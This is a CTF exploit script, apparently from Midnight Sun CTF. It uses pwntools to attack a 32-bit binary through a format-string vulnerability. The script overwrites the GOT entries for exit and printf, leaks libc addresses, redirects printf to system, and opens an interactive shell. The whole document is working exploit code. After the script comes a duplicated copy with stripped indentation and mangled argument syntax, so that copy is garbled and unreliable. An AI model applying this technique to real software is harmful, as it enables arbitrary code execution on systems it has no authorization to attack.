SakiiR/exploit.py

## exploit.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

context.terminal = ["tmux", "splitw", "-h"]
exe = context.binary = ELF("./challenge")

host = args.HOST or "pwn2-01.play.midnightsunctf.se"
port = int(args.PORT or 10002)


def local(argv=[], *a, **kw):
    """Execute the target binary locally"""
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    """Connect to the process on the remote host"""
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    """Start the exploit against the target."""
    if args.LOCAL:
        return local(argv, *a, **kw), ELF("/usr/lib32/libc.so.6")
    else:
        return remote(argv, *a, **kw), ELF("./libc.so.6")


gdbscript = """
b *0x08048688
continue
""".format(
    **locals()
)

# -- Exploit goes here --

smain = 0x080485F5


def do(i):
    io, libc = start()

    log.info("exit      @ 0x{:08x}".format(exe.got["exit"]))
    writes = {exe.got["exit"]: smain}
    payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
    io.sendlineafter("input: ", payload)

    payload = ""
    payload += "%2$08x"

    io.sendlineafter("input: ", payload)

    _IO_2_1_stdin_ = int(io.recvline(), 16)
    libc.address = _IO_2_1_stdin_ - libc.symbols["_IO_2_1_stdin_"]

    binsh = libc.search("/bin/sh").next()
    log.info("_IO_2_1_stdin_ @ 0x{:08x}".format(libc.symbols["_IO_2_1_stdin_"]))
    log.info("Libc           @ 0x{:08x}".format(libc.address))
    log.info("system         @ 0x{:08x}".format(libc.symbols["system"]))
    log.info("/bin/sh        @ 0x{:08x}".format(binsh))

    writes = {exe.got["printf"]: libc.symbols["system"]}

    payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
    print(payload)
    io.sendlineafter("input: ", payload)

    io.interactive()


def main():
    do(1)


if __name__ == "__main__":
    main()
	#!/usr/bin/env python
	# -- coding: utf-8 --
	from pwn import *

	context.terminal = ["tmux", "splitw", "-h"]
	exe = context.binary = ELF("./challenge")

	host = args.HOST or "pwn2-01.play.midnightsunctf.se"
	port = int(args.PORT or 10002)


	def local(argv=[], a, *kw):
	"""Execute the target binary locally"""
	if args.GDB:
	return gdb.debug([exe.path] + argv, gdbscript=gdbscript, a, *kw)
	else:
	return process([exe.path] + argv, a, *kw)


	def remote(argv=[], a, *kw):
	"""Connect to the process on the remote host"""
	io = connect(host, port)
	if args.GDB:
	gdb.attach(io, gdbscript=gdbscript)
	return io


	def start(argv=[], a, *kw):
	"""Start the exploit against the target."""
	if args.LOCAL:
	return local(argv, a, *kw), ELF("/usr/lib32/libc.so.6")
	else:
	return remote(argv, a, *kw), ELF("./libc.so.6")


	gdbscript = """
	b *0x08048688
	continue
	""".format(
	**locals()
	)

	# -- Exploit goes here --

	smain = 0x080485F5


	def do(i):
	io, libc = start()

	log.info("exit @ 0x{:08x}".format(exe.got["exit"]))
	writes = {exe.got["exit"]: smain}
	payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
	io.sendlineafter("input: ", payload)

	payload = ""
	payload += "%2$08x"

	io.sendlineafter("input: ", payload)

	_IO_2_1_stdin_ = int(io.recvline(), 16)
	libc.address = _IO_2_1_stdin_ - libc.symbols["_IO_2_1_stdin_"]

	binsh = libc.search("/bin/sh").next()
	log.info("_IO_2_1_stdin_ @ 0x{:08x}".format(libc.symbols["_IO_2_1_stdin_"]))
	log.info("Libc @ 0x{:08x}".format(libc.address))
	log.info("system @ 0x{:08x}".format(libc.symbols["system"]))
	log.info("/bin/sh @ 0x{:08x}".format(binsh))

	writes = {exe.got["printf"]: libc.symbols["system"]}

	payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
	print(payload)
	io.sendlineafter("input: ", payload)

	io.interactive()


	def main():
	do(1)


	if __name__ == "__main__":
	main()